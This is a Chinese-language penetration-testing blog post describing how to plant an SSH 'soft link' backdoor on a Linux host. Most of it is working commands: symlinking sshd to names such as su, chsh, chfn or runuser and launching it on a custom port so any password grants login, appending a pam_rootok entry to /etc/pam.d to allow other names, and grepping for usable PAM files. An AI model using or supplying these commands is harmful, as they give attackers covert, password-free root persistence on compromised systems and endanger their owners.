內網滲透-ssh 軟連接后門使用


經測試,普通用戶建立軟連接沒有問題,但是在使用軟連接啟動sshd指定端口時,無法load host key只測試成功了root用戶下執行后門命令,然后通過其他普通用戶任用密碼登錄

通過軟連接建立后門

ln -sf /usr/sbin/sshd /usr/local/su;/usr/local/su -oport=12345

說明:建立軟連接到/usr/local/su 文件,也可以在其他目錄,su文件名字不能變,變了就無法登錄。當然可以通過其他設置,更改su名字也是可以的。然后啟動,並指定監聽12345端口,登錄的時候密碼隨意即可,登錄如下:

注意:這個如果目標在執行軟連接的時候,如果使用了其他賬號創建,則登錄的時候需要使用對應的賬號,而非root

ssh root@xxx.xxx.xxx.xxx -p 12345

上面提到要更改軟連接su名字,需要用以下命令,xxxxxx為你需要更改的名字:

echo " 
 #%PAM-1.0
 auth       sufficient   pam_rootok.so
 auth       include      system-auth
 account    include      system-auth
 password   include      system-auth
 session    include      system-auth " >> /etc/pam.d/xxxxx

之后再開啟端口監聽,用於登錄

ln -sf /usr/sbin/sshd /tmp/xxxxxx;/tmp/xxxxxx -oport=12345

也可以使用其他軟連接名字,但是文件必須得在/etc/pam.d 目錄下存在。在/etc/pam.d目錄下執行:

find /etc/pam.d |xargs grep "pam_rootok" 
./config-util:auth sufficient pam_rootok.so
./chfn:auth sufficient pam_rootok.so
./chsh:auth sufficient pam_rootok.so
./runuser:auth sufficient pam_rootok.so
./su:auth sufficient pam_rootok.so
./xxxxxx:auth sufficient pam_rootok.so

登錄方式

ln -sf /usr/sbin/sshd /tmp/chsh;/tmp/chsh -oport=23333
ln -sf /usr/sbin/sshd /tmp/chfn;/tmp/chfn -oport=23334
ln -sf /usr/sbin/sshd /tmp/runuser;/tmp/runuser -oport=23335

參考鏈接:

https://www.jozxing.cc/archives/1653


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM